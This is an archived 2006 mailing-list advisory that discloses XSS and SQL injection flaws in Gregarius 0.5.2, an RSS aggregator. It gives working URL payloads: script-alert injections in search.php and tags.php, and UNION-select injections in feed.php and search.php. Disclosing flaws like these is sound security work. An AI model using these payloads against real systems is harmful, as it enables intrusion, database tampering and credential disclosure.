|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Gregarius 0.5.2 XSS and SQL Injection Vulnerabilities
tzitaroth
gmail.com
Date: Fri Mar 03 2006 - 07:29:55 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
http://gregarius.net/
Gregarius is a web-based RSS/RDF/ATOM feed aggregator, designed to run on your web server, allowing you to access your news sources from wherever you want.
XSS in search.php:
search.php?rss_query=<script>alert(1)</script>&rss_query_match=exact
XSS in tags.php:
tags.php?tag=<script>alert(1)</script>
SQL Injection in feed.php:
feed.php?folder=3 and 1=1 UNION select title from item--
with magic_quotes=off:
SQL Injection in search.php:
search.php?rss_query=aa%')) UNION select null,null,null,null,null,null,null,null,null,null,null,title,null from item-- &rss_query_match=exact
On Gregarius 0.5.2/PostrgreSQL this could lead to damaging/altering the DB and possible local file disclosure due to not properly sanitized $lang include, on early 0.5.3 svn version to admin hash disclosure.
More XSS and SQL Injections in admin section.
Fixed in latest 0.5.3 svn.
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]